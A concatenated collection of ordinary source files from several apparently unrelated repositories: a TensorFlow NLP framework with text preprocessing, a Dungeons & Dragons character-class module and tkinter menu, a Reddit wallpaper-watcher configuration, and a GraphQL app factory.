values_present[j]=tf.stack(values_present[j],axis=1)
past_dec[j]=tf.concat([past_dec[j],values_present[j]],axis=-2)
h = norm(h, 'ln_f')
# Language model loss. Do tokens <n predict token n?
h_flat = tf.reshape(h, [batch * sequence, self.hparams.n_embd])
logits = tf.matmul(h_flat, self.wte, transpose_b=True)
logits = tf.reshape(logits, [batch, sequence, self.hparams.n_vocab])
results['logits'] = logits
results['presents']= past_dec
return results
```
#### File: my-tf-framework-for-nlp-tasks/MyEstimator/ModelFn.py
```python
from abc import ABCMeta, abstractmethod
from tensorflow.python.util import nest
import tensorflow as tf
from collections import OrderedDict
from enum import Enum
import json
from typing import List, Dict, Any, Collection, NoReturn, Set, Union
class PlaceholderType(Enum):
Text = 1
TargetInt = 2
TargetFloat = 3
TextLength = 4
TextAttnMask = 5
TextTargMask = 6
BatchSize = 7
SpecialBatchInformation = 8
class PlaceholderMetaData():
def __init__(self, type: PlaceholderType, dtype, shape, from_file_name=None, Ref=None):
"""
:param type: source input type for this placeholder
:param dtype: dtype for tf.placeholder
:param shape: shape for tf.placeholder
:param from_file_name: source data file's name for this placeholder
There are two ways to load data:
1.Read data for each placeholder from each from_file_name.
2.Read all data from one tsv file. The first line of the tsv must be the names of corresponding placeholders.
        :param Ref: if Ref is None, this placeholder does not depend on any other placeholder (e.g. Text).
        For a TextLength placeholder, which depends on a Text placeholder, Ref should be
        the name of that Text placeholder.
"""
self.type = type
self.Ref = Ref
self.shape = shape
self.from_file_name = from_file_name
self.dtype = dtype
class ModelFn:
def __init__(self):
"""
A model could have n placeholders, m losses to optimize,
k losses to only watch, t predictions to output.
Every placeholder, loss, prediction should have a name.
Each loss requires x placeholders, which can be represented as {loss_name:[placeholder1,...]}.
        Each prediction requires x placeholders, which can be represented as {prediction_name:[placeholder1,...]}.
        Different losses, predictions and optimize_ops may conflict, so sometimes you cannot fetch all of them in a single run.
        Although this rarely happens, we provide a strategy to deal with it.
        In the eval stage, we use a list named eval_steps to define how to evaluate all losses in n steps.
        n=len(eval_steps)
        eval_steps=[step1,step2,...stepn]
        step_i is a list of losses
        Conflicting losses can be put into different steps.
        Notice that using more than one eval step causes additional computational overhead,
        so do this only when necessary.
        In the training stage we similarly provide a "training_steps" list, where
training_steps=[batch_1_step,batch_2_step,...]
batch_1_step=[step1,step2,...]
step1=[loss1,...] ...
In training stage:
for one_batch_steps in training_steps:
produce one batch data
for losses in one_batch_steps:
split losses into can_be_optimized and only_watch
then train(can_be_optimized,data) and fetch(only_watch,data)
        In the prediction stage, there is a list named "predicting_steps", similar to "eval_steps".
        In the training stage, we create a train_op for each optimized loss.
        During training steps, if a loss is in self.losses_groups, ModelWrapper runs the corresponding train_op
        and fetches the loss value; otherwise ModelWrapper only fetches the loss value to display.
"""
# initialized when create placeholders
self.placeholder_groups: Dict[int, Dict[str, tf.placeholder]] = OrderedDict()
# initialized when building training graph
self.losses_groups: Dict[int, Dict[str, any]] = OrderedDict()
# initialized when building training graph
self.losses_only_watch_groups: Dict[int, Dict[str, any]] = OrderedDict()
# initialized when building inference graph
        # NOTICE that all prediction tensors should be batch-first.
self.prediction_groups: Dict[int, Dict[str, any]] = OrderedDict()
# initialized when the object is constructed. self.init_check() can help to check some errors.
self.placeholder_requirement_for_losses: Dict[str, List[str]] = {}
self.placeholder_requirement_for_predictions: Dict[str, List[str]] = {}
self.placeholders_meta_data: Dict[str, PlaceholderMetaData] = {}
self.training_steps: List[List[List[str]]] = [] # [batch1=[ step1=loss1,step2=loss3,... ] ]
self.eval_steps: List[List[str]] = [] # [first_step=[loss1,loss3],second_step=[loss2]]
self.predicting_steps: List[List[str]] = [] # [first_step=[pred1,pred2],second_step=[pred3]]
self.config: Dict[str, Any] = {}
# self.batch_train_steps_pointer = 0
def check_after_init(self):
# check if there are obvious errors after init.
# check type and length
def check_type_and_len(var: Collection, var_type, least_elements: int):
assert var is not None, "var can not be None"
assert type(var) == var_type, "Wrong type, should be %s" % (str(var_type))
assert len(var) > least_elements, "%s must have more than %d elements" % (str(var_type), least_elements)
check_type_and_len(self.placeholders_meta_data, dict, 0)
check_type_and_len(self.placeholder_requirement_for_losses, dict, 0)
for k, v in self.placeholder_requirement_for_losses.items():
check_type_and_len(v, list, 0)
check_type_and_len(self.placeholder_requirement_for_predictions, dict, -1)
for k, v in self.placeholder_requirement_for_predictions.items():
check_type_and_len(v, list, 0)
check_type_and_len(self.config, dict, -1)
check_type_and_len(self.training_steps, list, 0)
for batch_training_steps in self.training_steps:
check_type_and_len(batch_training_steps, list, 0)
for one_step_losses in batch_training_steps:
check_type_and_len(one_step_losses, list, 0)
# all required placeholders exist:
required_placeholders_set = set()
for loss_name in self.placeholder_requirement_for_losses.keys():
required_placeholders_set = required_placeholders_set | set(
self.placeholder_requirement_for_losses[loss_name])
for pred_name in self.placeholder_requirement_for_predictions.keys():
required_placeholders_set = required_placeholders_set | set(
self.placeholder_requirement_for_predictions[pred_name])
exist_placeholders_1 = set([name for name in self.placeholders_meta_data.keys()])
assert len(required_placeholders_set) == len(exist_placeholders_1), "all required placeholders should exist"
assert len(required_placeholders_set) == len(
required_placeholders_set & exist_placeholders_1), "all required placeholders should exist"
# losses in training steps should exist in self.placeholder_requirement_for_losses:
losses_in_training_steps = set()
for batch_training_steps in self.training_steps:
for one_step_losses in batch_training_steps:
for loss_name in one_step_losses:
losses_in_training_steps.add(loss_name)
losses_in_placeholder_requirement = set()
for loss_name in self.placeholder_requirement_for_losses.keys():
losses_in_placeholder_requirement.add(loss_name)
for loss_name in losses_in_training_steps:
assert loss_name in losses_in_placeholder_requirement, \
"losses \"%s\" in training steps should exist in self.placeholder_requirement_for_losses" % (loss_name)
# different eval step can not have same losses, one eval step can not have same losses:
tmp = set()
for losses_in_one_eval_step in self.eval_steps:
for loss_name in losses_in_one_eval_step:
assert loss_name not in tmp, "different eval step can not have same losses, one eval step can not have same losses"
tmp.add(loss_name)
def check_after_build_graph(self):
# losses and losses_to_only_watch can not have overlap:
losses_to_optimize = self.get_items_group_by_name_from_by_id(self.losses_groups)
losses_to_watch = self.get_items_group_by_name_from_by_id(self.losses_only_watch_groups)
LOS = set([name for name in losses_to_optimize.keys()])
LWS = set([name for name in losses_to_watch.keys()])
LAS = LOS | LWS # Union
assert len(LAS) == len(LOS) + len(LWS)
@abstractmethod
def build_inferring_graph(self, group_id: int) -> NoReturn:
pass
@abstractmethod
def build_training_graph(self, group_id: int) -> NoReturn:
pass
@abstractmethod
def process_origin_data_for_placeholders(self, data: Dict[str, List[Any]], for_loss_n: str = None) -> Dict[
str, List[Any]]:
"""
:param data:
:param for_loss_n:
:return:
"""
pass
@abstractmethod
def vars_mapping_for_loading_transfer_param(self, vars_to_store: List[tf.Variable]) -> Dict[str, str]:
pass
@abstractmethod
def merge_batch_prediction_result(self, new_batch_result: Dict[str, Any],
previous_result: Union[Dict[str, Any], None]):
pass
@abstractmethod
def set_vocab_size(self, vocab_size: int) -> NoReturn:
pass
@abstractmethod
def new_losses_are_better(self, new_losses: Dict[str, float], old_losses: Dict[str, float]) -> bool:
pass
def feed_dict_post_process(self, feed_dict: Dict, data_name_not_exist: Set[str]) -> Dict:
return feed_dict
def create_placeholders(self, group_id: int) -> NoReturn:
"""an example of meta_dict: {'input':[dtype, shape, name]}"""
one_group_placeholders = {}
for key in self.placeholders_meta_data.keys():
x = self.placeholders_meta_data[key]
one_group_placeholders[key] = tf.placeholder(dtype=x.dtype, shape=x.shape, name=key + "_%d" % group_id)
self.placeholder_groups[group_id] = one_group_placeholders
def get_items_group_by_name_from_by_id(self, items_group_by_parallel_id: Dict[int, Dict[str, Any]]) -> Dict[
str, List]:
"""
        Only for transforming Dict[int, Dict[str, Any]] into Dict[str, List[Any]].
:param items_group_by_parallel_id:
:return:
"""
losses_dict = {}
for id in items_group_by_parallel_id.keys():
one_group = items_group_by_parallel_id[id]
for name in one_group.keys():
if name in losses_dict:
losses_dict[name].append(one_group[name])
else:
                    losses_dict[name] = [one_group[name]]  # wrap in a list so later groups can be appended
return losses_dict
def get_all_configs_in_json(self):
# todo:how to convert a complex object to json?
config_json = {}
for key in self.config.keys():
if type(self.config[key]) == PlaceholderMetaData:
config_json[key] = self.config[key].__dict__
else:
config_json[key] = self.config[key]
print(config_json)
return json.dumps(config_json, sort_keys=True, indent=4)
```
#### File: my-tf-framework-for-nlp-tasks/TextPreprocessing/ekphrasis_for_preprocess.py
```python
from ekphrasis.classes.preprocessor import TextPreProcessor
from ekphrasis.classes.tokenizer import SocialTokenizer
from ekphrasis.dicts.emoticons import emoticons
from TextPreprocessing.TextPreprocessor import TextPreprocessor
class EkphrasisTextPreprocess(TextPreprocessor):
def __init__(self):
super(EkphrasisTextPreprocess, self).__init__(name='ekphrasis')
self.tool = get_text_processor()
def pre_process_doc(self, doc: str):
return self.tool.pre_process_doc(doc)
def get_text_processor()->TextPreProcessor:
text_processor = TextPreProcessor(
# terms that will be normalized
normalize=['url', 'email', 'percent', 'money', 'phone', 'user',
'time', 'url', 'date', 'number'],
# terms that will be annotated
annotate={"hashtag", "allcaps", "elongated", "repeated",
'emphasis', 'censored'},
fix_html=True, # fix HTML tokens
# corpus from which the word statistics are going to be used
# for word segmentation
segmenter="twitter",
# corpus from which the word statistics are going to be used
# for spell correction
corrector="twitter",
unpack_hashtags=True, # perform word segmentation on hashtags
unpack_contractions=True, # Unpack contractions (can't -> can not)
spell_correct_elong=False, # spell correction for elongated words
# select a tokenizer. You can use SocialTokenizer, or pass your own
# the tokenizer, should take as input a string and return a list of tokens
tokenizer=SocialTokenizer(lowercase=True).tokenize,
# list of dictionaries, for replacing tokens extracted from the text,
# with other expressions. You can pass more than one dictionaries.
dicts=[emoticons]
)
return text_processor
def test():
text_processor=get_text_processor()
sentences = [
"CANT WAIT for the new season of #TwinPeaks \(^o^)/!!! #davidlynch #tvseries :)))",
"I saw the new #johndoe movie and it suuuuucks!!! WAISTED $10... #badmovies :/",
"@SentimentSymp: can't wait for the Nov 9 #Sentiment talks! YAAAAAAY !!! :-D http://sentimentsymposium.com/."
]
for s in sentences:
print(" ".join(text_processor.pre_process_doc(s)))
```
#### File: my-tf-framework-for-nlp-tasks/TextPreprocessing/TextIndexTranslator.py
```python
from abc import ABCMeta, abstractmethod
from typing import List, Dict, Any, Collection, Callable
class TextIndexTranslator:
def __init__(self, name: str, eos_id: int):
self.name = name
self.eos_id = eos_id
@abstractmethod
def encode(self, text) -> List[int]:
pass
@abstractmethod
def decode(self, tokens: List[int]) -> str:
pass
@abstractmethod
def get_vocab_size(self) -> int:
pass
```
#### File: my-tf-framework-for-nlp-tasks/UserDefined/file_format_adapter.py
```python
from TextPreprocessing.file_api import read_file_lines,write_file_lines
base_path = '../data/my_s2s_test_data/'
input='informal.txt'
target='formal.txt'
def combine(inf_path,fm_path,out_path):
inf=read_file_lines(inf_path)
fm=read_file_lines(fm_path)
r=['input\ttarget']
for i,f in zip(inf,fm):
r.append(i+'\t'+f)
write_file_lines(out_path,lines=r)
combine(base_path+'train/informal',base_path+'train/formal',base_path+'train.tsv')
combine(base_path+'tune/informal',base_path+'tune/formal.ref0',base_path+'dev.tsv')
``` |
{
"source": "JimTheBirdman/DnD-Machine",
"score": 3
} |
#### File: JimTheBirdman/DnD-Machine/Classes.py
```python
import armor
class Class():
def __init__(self, name, hit_dice, armor_prof, weapon_prof, tools, saving_throws, skills, equipment, features, cantrips, spells_known, spell_slots):
self.name = name #String
self.hit_dice = hit_dice #Int
self.armor_prof = armor_prof #Array of strings
self.weapon_prof = weapon_prof #Array of strings
self.tools = tools #Array of strings, because of Bard
self.saving_throws = saving_throws #Array of strings
self.skills = skills #2D Array, first value is how many choices
self.equipment = equipment #Array of strings
self.features = features #Array of strings
self.cantrips = cantrips #Int
self.spells_known = spells_known #Int, or string if needs to be calced
self.spell_slots = spell_slots #Int, spell slots at level 1
self.prof_bonus = 2 #Int, hard coded for level 1
Barbarian = Class(
"Barbarian",
12,
["Light Armor", "Medium Armor", "Shields"],
["Simple", "Martial"],
None,
["Strength", "Constitution"],
[2, ["Animal Handling", "Athletics", "Intimidation", "Nature", "Perception", "Survival"]],
[
["Greataxe", "Any Martial"],
["2 Handaxes", "Any Simple"],
[["Explorer's Pack", "4 Javelins"]]
],
["Rage", "Unarmored Defense"],
None,
None,
None
)
Bard = Class(
"Bard",
    8,  # Bard uses a d8 hit die
["Light Armor"],
["Simple", "Hand Crossbow", "Longsword", "Rapier", "Shortsword"],
"Three musical instruments",
["Dexterity", "Charisma"],
[2, ["Athletics", "Acrobatics", "Sleight of Hand", "Stealth", "Arcana",
"History", "Investigation", "Nature", "Religion", "Animal Handling",
"Insight", "Medicine", "Perception", "Survival", "Deception",
"Intimidation", "Performance", "Persuasion"]],
[
["Rapier", "Longsword", "Any Simple"],
["Diplomat's Pack", "Entertainer's Pack"],
["Lute", "Any instrument"],
["Leather"],
["Dagger"]
],
["Spellcasting", "Bardic Inspiration(d6)"],
2,
4,
2
)
Cleric = Class(
"Cleric",
8,
["Light Armor", "Medium Armor", "Shields"],
["Simple"],
None,
["Wisdom", "Charisma"],
[2, ["History", "Insight", "Medicine", "Persuasion", "Religion"]],
[
["Mace"],
["Scale Mail", "Leather"],
["Light Crossbow and 20 Bolts", "Any Simple"],
["Priest's Pack", "Explorer's Pack"],
["Shield"],
["Holy Symbol"]
],
["Spellcasting", "Divine Domain"],
3,
"Wisdom mod + cleric level",
2
)
Druid = Class(
"Druid",
8,
["Light Armor", "Medium Armor", "Shields"], #Cannot be made of metal
["Club", "Dagger", "Dart", "Javelin", "Mace", "Quarterstaff", "Scimitar", "Sling", "Spear"],
"Herbalism Kit",
["Intelligence", "Wisdom"],
[2, ["Arcana", "Animal Handling", "Insight", "Medicine", "Nature", "Perception", "Religion", "Survival"]],
[
["Shield", "Any Simple"],
["Scimitar", "Any Simple Melee"],
["Leather"],
["Explorer's Pack"],
["Druidic Focus"]
],
["Druidic", "Spellcasting"],
2,
"Wisdom mod + druid level",
2
)
Fighter = Class(
"Fighter",
10,
["Light Armor", "Medium Armor", "Heavy Armor", "Shields"],
["Simple", "Martial"],
None,
["Strength", "Constitution"],
[2, ["Acrobatics", "Animal Handling", "Athletics", "History", "Insight",
"Intimidation", "Perception", "Survival"]],
[
["Chain Mail", ["Leather", "Longbow", "20 Arrows"]],
[["Any Martial", "Shield"], "Any 2 Martial"],
[["Light Crossbow", "20 Bolts"], "2 Handaxes"],
["Dungeoneer's Pack", "Explorer's Pack"]
],
["Fighting Style", "Second Wind"],
None,
None,
None
)
Monk = Class(
"Monk",
8,
None,
["Simple", "Shortsword"],
["One Artisan's Tools", "One instrument"],
["Strength", "Dexterity"],
[2, ["Acrobatics", "Athletics", "History", "Insight", "Religion", "Stealth"]],
[
["Shortsword", "Any Simple"],
["Dungeoneer's Pack", "Explorer's Pack"],
["10 Darts"]
],
["Unarmored Defense", "Martial Arts(1d4)"],
None,
None,
None
)
Paladin = Class(
"Paladin",
10,
["Light Armor", "Medium Armor", "Heavy Armor", "Shields"],
["Simple", "Martial"],
None,
["Wisdom", "Charisma"],
[2, ["Athletics", "Insight", "Intimidation", "Medicine", "Persuasion", "Religion"]],
[
[["Any Martial", "Shield"], "Any 2 Martial"],
["5 Javelins", "Any Simple Melee"],
["Priest's Pack", "Explorer's Pack"],
[["Chain Mail", "Holy Symbol"]]
],
["Divine Sense", "Lay on Hands"],
None,
None,
None
)
Ranger = Class(
"Ranger",
10,
["Light Armor", "Medium Armor", "Shields"],
["Simple", "Martial"],
None,
["Strength", "Dexterity"],
[3, ["Animal Handling", "Athletics", "Insight", "Investigation", "Nature", "Perception", "Stealth", "Survival"]],
[
["Scale Mail", "Leather"],
["2 Shortswords", "Any 2 Simple Melee"],
["Dungeoneer's Pack", "Explorer's Pack"],
[["Longbow", "20 Arrows"]]
],
["Favored Enemy", "Natural Explorer"],
None,
None,
None
)
Rogue = Class(
"Rogue",
8,
["Light Armor"],
["Simple", "Hand Crossbow", "Longswords", "Rapier", "Shortsword"],
"Thieve's Tools",
["Dexterity", "Intelligence"],
[4, ["Acrobatics", "Athletics", "Deception", "Insight", "Intimidation", "Investigation", "Perception", "Performance", "Persuasion", "Sleight of Hand", "Stealth"]],
[
["Rapier", "Shortsword"],
[["Shortbow", "20 Arrows"], "Shortsword"],
["Burglar's Pack", "Dungeoneer's Pack", "Explorer's Pack"],
[["Leather", "2 Daggers", "Thieve's Tools"]]
],
["Expertise", "Sneak Attack(1d6)", "Thieves' Cant"],
None,
None,
None
)
Sorceror = Class(
"Sorceror",
6,
None,
["Dagger", "Dart", "Sling", "Quarterstaff", "Light Crossbow"],
None,
["Constitution", "Charisma"],
[2, ["Arcana", "Deception", "Insight", "Intimidation", "Persuasion", "Religion"]],
[
[["Light Crossbow", "20 Bolts"], "Any Simple"],
["Component Pouch", "Arcane Focus"],
["Dungeoneer's Pack", "Explorer's Pack"],
["2 Daggers"]
],
["Spellcasting", "Sorcerous Origin"],
4,
2,
2
)
Warlock = Class(
"Warlock",
8,
["Light Armor"],
["Simple"],
None,
["Wisdom", "Charisma"],
[2, ["Arcana", "Deception", "History", "Intimidation", "Investigation", "Nature", "Religion"]],
[
[["Light Crossbow", "20 Bolts"], "Any Simple"],
["Component Pouch", "Arcane Focus"],
["Scholar's Pack", "Dungeoneer's Pack"],
[["Leather", "Any Simple", "2 Daggers"]]
],
["Otherworldly Patron", "Pact Magic"],
2,
2,
1
)
Wizard = Class(
"Wizard",
6,
None,
["Dagger", "Dart", "Sling", "Quarterstaff", "Light Crossbow"],
None,
["Intelligence", "Wisdom"],
[2, ["Arcana", "History", "Insight", "Investigation", "Medicine", "Religion"]],
[
["Quarterstaff", "Dagger"],
["Component Pouch", "Arcane Focus"],
["Scholar's Pack", "Explorer's Pack"],
["Spellbook"]
],
["Spellcasting", "Arcane Recovery"],
3,
"Intelligence mod + Wizard level",
2
)
CLASSES = [
Barbarian,
Bard,
Cleric,
Druid,
Fighter,
Monk,
Paladin,
Ranger,
Rogue,
Sorceror,
Warlock,
Wizard
]
```
#### File: JimTheBirdman/DnD-Machine/D&D Machine.py
```python
from tkinter import *
from tkinter import filedialog
from tkinter.filedialog import askopenfilename
# Assign functions to menu items
def OpenChar():
#name = askopenfilename()
path = filedialog.askopenfilename(initialdir="/", title="Select File",
filetypes=(("txt files", "*.txt"),("all files", "*.*")))
def About():
print("This is a simple example of a menu")
def DiceBot():
import DiceBot2
print("Clickety Clack!")
def NameRandom():
print("First Name", "Last Name")
def blanksheet():
import blank_sheet
def rando_char():
import rando
# Create tkinter box
root = Tk()
root.title("D&D Machine")
root.geometry("600x500")
root.configure(bg='grey')
# Create menu with options
menu = Menu(root)
root.config(menu=menu)
filemenu = Menu(menu)
menu.add_cascade(label="File", menu=filemenu)
submenu = Menu(filemenu)
submenu.add_command(label="Random Character", command=rando_char)
submenu.add_command(label="Blank Character Sheet", command=blanksheet)
filemenu.add_cascade(label="New Character", menu=submenu, underline=0)
filemenu.add_command(label="Open Existing Character", command=OpenChar)
#filemenu.add_command(label="Save", command=SaveChar)
#filemenu.add_command(label="Delete", command=DeleteChar)
#filemenu.add_command(label="Print", command=PrintChar)
filemenu.add_separator()
filemenu.add_command(label="Exit", command=root.destroy)
toolmenu = Menu(menu)
menu.add_cascade(label="Tools", menu=toolmenu)
toolmenu.add_command(label="DiceBot", command=DiceBot)
toolmenu.add_command(label="NPC Name Generator", command=NameRandom)
helpmenu = Menu(menu)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=About)
mainloop()
``` |
{
"source": "JimTheCactus/RedditWallpaperWatcher",
"score": 3
} |
#### File: JimTheCactus/RedditWallpaperWatcher/config_objects.py
```python
from typing import List, Dict, Optional
from dataclasses import dataclass, field
import jsons
import yaml
@dataclass
class SubredditConfig():
""" Holds any per-subreddit configuration. That's nothing right now. """
@dataclass
class MultiredditConfig():
""" Holds information necessary to access a multireddit """
user: str
multi: str
@dataclass
class SourcesConfig():
""" Holds information about image sources """
subreddits: Optional[Dict[str, Optional[SubredditConfig]]]
multis: Optional[Dict[str, MultiredditConfig]]
@dataclass
class Size():
""" Holds a size """
width: int
height: int
aspect_ratio: float = field(init=False, repr=False)
def __post_init__(self):
self.aspect_ratio = float(self.width) / float(self.height)
@dataclass
class TargetConfig():
""" Holds information about a save target """
path: str
size: Size
sources: List[str]
allow_nsfw: bool = True
@dataclass
class WallpaperConfig():
""" Loads and holds the configuration for wallpaperwatcher. """
aspect_ratio_tolerance: float
max_downloads: int
update_interval: int
sources: SourcesConfig
targets: Dict[str, TargetConfig]
@staticmethod
def from_file(filename: str) -> "WallpaperConfig":
""" Creates a WallpaperConfig from a YAML file """
with open(filename, "r") as input_file:
return jsons.load(yaml.load(input_file, Loader=yaml.SafeLoader), WallpaperConfig)
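    # A minimal sketch of the YAML this expects (field names mirror the dataclasses
    # above; the concrete names and values here are invented for illustration):
    #   aspect_ratio_tolerance: 0.05
    #   max_downloads: 10
    #   update_interval: 300
    #   sources:
    #     subreddits:
    #       wallpaper: {}
    #     multis: {}
    #   targets:
    #     desktop:
    #       path: /home/user/wallpapers
    #       size: {width: 1920, height: 1080}
    #       sources: [wallpaper]
    #       allow_nsfw: false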
@dataclass
class RedditAuthInfo():
""" Holds Reddit Authentication Values """
client_id: str
client_secret: str
@staticmethod
def from_file(filename: str) -> "RedditAuthInfo":
""" Creates a RedditAuthInfo from a YAML file """
with open(filename, "r") as input_file:
auth = jsons.load(yaml.load(input_file, Loader=yaml.SafeLoader), RedditAuthInfo)
return auth
``` |
{
"source": "jimtheplant/bioplatform",
"score": 3
} |
#### File: bioplatform/bioplatform/app.py
```python
from graphene import Schema
from starlette.applications import Starlette
from starlette.graphql import GraphQLApp
from .types import BioPlatformInitializer
from .util import AppStatus
DEFAULT_QUERY_TYPES = [
AppStatus
]
def __initialize_modules(initializer: BioPlatformInitializer, query_types):
query_types.append(initializer.init())
def __create_starlette_app(base_schema: Schema):
app = Starlette()
gql_app = GraphQLApp(schema=base_schema)
app.add_route('/', gql_app)
return app
def app_factory(initializer: BioPlatformInitializer, extra_types=None):
"""
This function acts as the main app factory. Creates the BaseQuery object with the queries from other BioPlatform
modules. By default, the app will have an AppStatus query.
    :param initializer: A BioPlatformInitializer from a module
:param extra_types: Any types that are not present in a module's base query, but could be used by other modules
:return: A Starlette app object with a GQL endpoint at '/'
"""
query_types = []
query_types.extend(DEFAULT_QUERY_TYPES)
__initialize_modules(initializer, query_types)
base_query = type("BaseQuery", tuple(query_types), {})
base_schema = Schema(query=base_query, types=extra_types)
return __create_starlette_app(base_schema)
``` |